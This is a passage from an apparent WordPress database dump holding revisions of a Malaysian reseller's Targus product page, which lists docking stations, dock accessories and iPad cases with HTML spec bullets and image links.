user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-05 08:38:51','2019-11-05 00:38:51','',3686,'https://bintara.com.my/blog/2019/11/05/3686-revision-v1/',0,'revision','',0),(3685,1,'2019-10-31 08:50:57','2019-10-31 00:50:57','Docking Stations, Docking Accessories, Tablet Cases &  <a href=\"#\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1678\" src=\"#\" alt=\"\" width=\"1024\" height=\"681\" />','Targus','','inherit','closed','closed','','3683-autosave-v1','','','2019-10-31 08:50:57','2019-10-31 00:50:57','',3683,'https://bintara.com.my/blog/2019/10/31/3683-autosave-v1/',0,'revision','',0),(3693,1,'2019-11-05 10:08:24','2019-11-05 02:08:24','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-05 10:08:24','2019-11-05 02:08:24','',3686,'https://bintara.com.my/blog/2019/11/05/3686-revision-v1/',0,'revision','',0),(3695,1,'2019-11-05 11:29:57','2019-11-05 03:29:57','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, 